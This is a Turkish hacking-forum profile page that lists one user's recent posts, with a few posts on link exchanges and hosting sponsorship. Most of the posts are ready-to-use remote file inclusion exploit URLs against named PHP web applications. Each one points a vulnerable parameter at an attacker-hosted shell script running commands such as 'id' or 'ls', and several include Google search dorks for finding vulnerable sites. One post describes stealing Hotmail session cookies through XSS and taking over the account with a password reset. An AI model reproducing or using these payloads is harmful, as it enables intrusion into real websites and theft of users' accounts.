Partizan kullanıcısının son içeriği

  1. Partizan

    MyBace Light (login_check.php) Remote File Vulnerability

    MyBace Light (login_check.php) Remote File Vulnerability ExpLoit: http://hedefsite.com/includes/login_check.php?hauptverzeichniss=http://shel.txt?cmd=id
  2. Partizan

    YACS CMS - File Inclusion Vulnerability

    YACS CMS - File Inclusion Vulnerability ExpLoit: http://hedefsite.com/[patch]/yacs/articles/article.php?context[path_to_root]=http://url--ataca.org/shell.txt?
  3. Partizan

    phpAtm <= v1.21 (include_location) Remote File Inclusion Exploit

    phpAtm <= v1.21 (include_location) Remote File Inclusion Exploit Level : Dangerous Download : http://phpatm.free.fr/ Version : v1.21 Exploit: http://www.sitename.com/[script_path]/confirm.php?include_location=http://shellurl.com ...
  4. Partizan

    3 Siteye SponsorLuk TekLifim..

    3 Kisiye 2 sene boyunca domain ve host konusunda sponsor oLmayi dusunuyorum.. Domain'i de host'u da ben aLicam fakat; icerikte forum olmayacak.. Portal tarzi, cogu siteden farkLi ozgun, telif hakki bizzat site sahibine ait oLan siteler icin gecerlidir bu tekLifim.. Kendine guvenen arkadaslar...
  5. Partizan

    Uzun bir aradan sonra Terkar Merhaba..

    SeLamlar.. uzun bir suredir aranizda yoktum.. Ben yokken bayagi sey degismis.. Yeni geLen arkadaslar oLmush onLarin hepsine hosgeLdiniz diyorum.. Artik ben varim .) koLay geLsin dostlarim..
  6. Partizan

    PHP Simple Shop <= 2.0 (abs_path) Remote File Inclusion

    PHP Simple Shop <= 2.0 (abs_path) Remote File Inclusion PHP Simple Shop Application : PHP Simple Shop version : Latest version [2.0] URL : http://www.turnkeywebtools.com/phpsimpleshop ExpLoit Link: ~~~~~~~~~~~~~~...
  7. Partizan

    Torbstoff News 4 <= (pfad) Remote File Inclusion Exploit

    Torbstoff News 4 <= (pfad) Remote File Inclusion Exploit GoogLe Arama: "Torbstoff News 4" ExpLoit : http://sitename.com/[Script Path]/news.php?pfad=http://SHELLURL.COM?
  8. Partizan

    ME Download System 1.3 Remote File Inclusion

    ME Download System 1.3 icin Vulnerabilities Remote fiLe incLude. http://hedefsite.com /templates/header.php?$Vb8878b936c2bd8ae0cab=http://evilsite.com?cmd=ls
  9. Partizan

    PR 5 Link Degisimi Yapmak IsteyenLer..

    PR 5 Sitem var Link degisimi yapmak isteyenler iLe degisim yapabiLiriz.. ilk 10 Site iLe degisim yapicagim.. iLgiLenen arkadasLar PM atarsa sevinirim..
  10. Partizan

    Portail PHP v1.7 <- (chemin) Remote Inclusion Vulnerability

    Portail PHP v1.7 <- (chemin) Remote Inclusion Vulnerability Script : Portail PHP Vulnerability Link: http://www.site.com/[path]/mod_membre/inscription.php?chemin=http://evil_scripts?
  11. Partizan

    a6mambohelpdesk Mambo Component <= 18RC1 Remote Include Vulnerability

    a6mambohelpdesk Mambo Component <= 18RC1 Remote Include Vulnerability GoogLe Arama : allinurl:"com_a6mambohelpdesk" Vulnerability Link: http://www.site.com/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://shell.txt
  12. Partizan

    Advisory: WMNews Remote File Include Vulnerability

    Advisory: WMNews Remote File Include Vulnerability GoogLe Arama: allinurl: *.php?Artid=* allinurl: *.php?ArtCat=* allinurl: wmprint.php allinurl: wmview.php Vulnerability Link: http://hedefsite.com/index.php?config=1&base_datapath=http://[evilhost]
  13. Partizan

    RsGallery2 for Joomla

    RsGallery2 for Joomla Acik Script : RsGallery2 Versiyon : latest version [ 1.11.2 ] Script Site : http://rsdev.nl GoogLe Arama : rsgallery2.html.php Exploit: http://[sitepath]/[joomlapath] /components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path= http://[attacker]
  14. Partizan

    GeekLog <= 1.4.0 Remote File Include Vulnerabilities

    Application : GeekLog version : latest version [ 1.4 ] URL : http://www.geeklog.net/ GoogLe Arama : "powered by geeklog" ExpLoit .] http://www.site.com/[path]/plugins/links/functions.inc?_CONF[path]=[Evil_Script]...
  15. Partizan

    HotmaiL'deki XSS'nin Ispat'i..

    geLen cookieLerin goruntuLeri. bu cookieler ne ise yarar ? cookieler sifresiz sekiLde mail hesabina girmeye yarar.. sifresini biLmedigimiz hesabi ne yapalim ? www.passport.net ' den sifirLama yoLLayarak posta kutusundan [inb0x] dan paroLayi degistirebilirsin.. Cogu Arkadas HaLen Isin...
Geri
Üst